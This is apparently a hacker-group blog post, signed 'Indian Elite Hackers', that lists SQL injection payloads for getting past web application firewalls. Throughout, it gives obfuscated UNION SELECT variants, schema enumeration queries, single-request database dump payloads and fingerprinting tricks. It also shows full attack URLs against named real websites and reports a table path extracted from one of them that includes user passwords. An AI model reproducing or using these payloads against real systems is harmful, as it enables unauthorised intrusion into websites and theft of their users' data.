WAF BYPASSING PART -II

22:56 ---

WAF evasion methods for sql Injections

I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

1) id=1+UnIoN+SeLecT 1,2,3 --+

2) id=1+UnIOn/**/SeLect 1,2,3 --+

3) id=1+UNIunionON+SELselectECT 1,2,3 --+

4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+

5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+

6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+

7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+

8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+

/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

div + 0
Having +1 = 0
AND+ 1 = 0
/*!and*/ +1 = 0
and( 1 )=(0 ) x
OR false the url query
id =- 1 union all select
id =null union all select
id =1 +and+ false + union +all +select
id = 9999 union all select

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//

http : //www.phm.ie/project.php?cat=Conservation'
+and(1)=(0) +union+distinct+select+ 1
and use: and 1=0 to apear column number in the page
or
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0‏)

Hard WAF bypass tips
Whitespaces :
union(select(0),version(),(0),(0),(0),(0),(0),(0),
(0))
%0Aunion%0Aselect%0A1,2,3--
/**/union/**/select/**/1,2,3--
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%20%28select%201,2,version
%28%29,4,5,6,7,8%29%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
NICE QUERY
www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+

www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Bypassing ::
(Double Keyword): UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni<on all sel<ect
%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f
%252a*/
+%23sexsexsex%0AUnIOn%23sexsexsex
%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%23aa%0Aselect%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/**/
union/*!50000select*/
%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/*!
20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/%201,2,version
%28%29,4,5,6,7,8%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
after id no. like id=1 +/*!and*/+1=0
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
false the url query :
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
id= - 1 union all select
id= null union all select
id=1 +and+false+ union+all+select
id= 9999 union all select
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Order Bypassing do like this
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/*!table_name*/
+from /*!information_schema*/./*!tables*/ where
table_schema=database()
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
unhex(hex(Concat
(Column_Name,0x3e,Table_schema,0x3e,table_
Name)))
/*!from*/information_schema.columns/*!where*/
column_name%20/*!like*/char(37,%20112,%2097,
%20115,%20115,%2037)
like ::
PHP Code:
http ://www.westbury.com/
article.php?
article_id=-117%20union%20select
%201,2,unhex%28hex%28Concat
%28Column_Name,0x3e,Table_
schema, 0x3e,table_Name
%29%29%29,4,5,6,7/*!from*/
information_schema.columns/*!
where*/column_name%20/*!like*/
char%2837,%20112,%2097,%20115,
%20115,%2037%29--
user_passwd>westbur6_website>user_info
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
used with order ::
convert( using ascii) or unhex(hex())
like :
PHP Code:
www. westbury. com/ article. php?
article_id =- 117 union select 1 , 2 ,
convert ( group_concat
(table_name ) using ascii ), 4 , 5 ,6 , 7 +
from +information_schema .tables --
IF'ascii' dosent work? you can try
PHP Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850

------------------------------Best Bypass WAF------------------------------------

[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Group_Concat
group_concat ()
/*!group_concat*/ ()
grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
group_concat (, 0x3c62723e )
g % 72oup_c % 6Fncat % 28 % 76% 65rsion
% 28 %29 ,% 22 ~ BlackRose% 22 %29
CoNcAt ()
CONCAT (DISTINCT Version ())
concat (, 0x3a ,)
concat %00 ()
% 00CoNcAt ()
/*!50000cOnCat*/ ( /*!Version()*/ )
/*!50000cOnCat*/
/**//*!12345cOnCat*/ (, 0x3a ,)
concat_ws ()
concat (0x3a ,, 0x3c62723e )
/*!concat_ws(0x3a,)*/
concat_ws ( 0x3a3a3a , version()
CONCAT_WS ( CHAR ( 32, 58, 32 ), version
(),)
REVERSE( tacnoc )
binary (version ())
uncompress (compress ( version()))
aes_decrypt ( aes_encrypt ( version
(), 1), 1 )[/ b ][/ u ][/ size ][/ color ]

[~] after id no. like id=1 +/*!and*/+1=0 [~]
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
cp852
cp866
cp932
dec8
euckr
latin1
utf8
trick to appear info inside img tag
PHP Code:
concat( 0x223e3c62723e ,, 0x3c696d
67207372633d22 )
when the column is get into html tag,but its not
always inside img tag.
it could be <a> or </noscript> or anything.
like ::
PHP Code:
http ://fzszy.chinacourt.org/
public/detail.php?
id=-168' union /*!
%53elect*/ concat
(0x223e3c2f613e3c2f74643e,
version
(),0x3c6120687265663d22)--+

[DUMP DB in 1 Request]
PHP Code:
( select (@) from ( select(@:= 0x00 ),
( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
(@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
( select(@) from ( select (@:= 0x00 ),
( select (@) from ( table ) where (@) in (@:= concat
(@, 0x0a , column1 , 0x3a , column2 )))) a )

[DUMP DB in 1 Request improve]
PHP Code:
( select(@ x ) from (select (@x := 0x00 ),
( select( 0 ) from
( information_schema . columns) where
( table_schema !
= 0x696e666f726d6174696f6e5f736368656d61 )and
( 0x00 ) in(@ x := concat
(@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
like
http : //www.marinaplast.com/page.php?
id=-13 union select 1,2,(select
(@x)from(select(@x:=0x00),(select
(0)from(information_schema.colu​​
mns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and
(0x00)in(@x:=​c​oncat
(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --

WHITESPACES BYPASS .
%09 %0A %0B %0C %0D %A0
get version - DB_NAME - user - HOST_NAME -
datadir
PHP Code:
version()
convert( version() using latin1 )
unhex ( hex( version()))
@@GLOBAL. VERSION
( substr
(@@version ,1 , 1 )=5 ) :: 1 true 0 fals
# like #
www. marinaplast. com/ page . php?
id =- 13 union select 1 , 2 ,( substr
(@@version ,1 , 1 )=5 ), 4, 5 --
1 it 's mean version 5 and 0 mean version 4
+and substring(version(),1,1)=4
+and substring(version(),1,1)=5
+and substring(version(),1,1)=9
+and substring(version(),1,1)=10
# like #
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=5
download good version 5
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=4
not download good version 4
version 5
id=1 /*!50094aaaa*/ error
id=1 /*!50095aaaa*/ no error
id=1 /*!50096aaaa*/ error
# like #
www.marinaplast.com/page.php?id=13 /
*!50095aaaa*/  no error v5
version 4
id=1 /*!40123 1=1*/--+- no error
id=1 /*!40122rrrr*/ no error
# like #
www.marinaplast.com/page.php?id=13 /
*!40122rrrr*/ error not v4
☆¸.•*☆ ☆*•.¸☆
DB_NAME()
@@database
database()
id=vv()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,DB_NAME
(),4,5 --
www.marinaplast.com/page.php?id=vv
()
☆¸.•*☆ ☆*•.¸☆
@@user
user()
user_name()
system_user()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,user
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,HOST_NAME
(),4,5 --
☆¸.•*☆ ☆*•.¸☆
@@datadir
datadir()
# like #
www.marinaplast.com/page.php?
id=-13 union select 1,2,datadir(),4,5 --
☆¸.•*☆ ☆*•.¸☆
ASPX
and 1=0/@@version
' and 1 =0 /@@ version;--
) and 1 =@@version--
and 1 = 0 /user ;--


©Indian Elite Hackers

0 comments: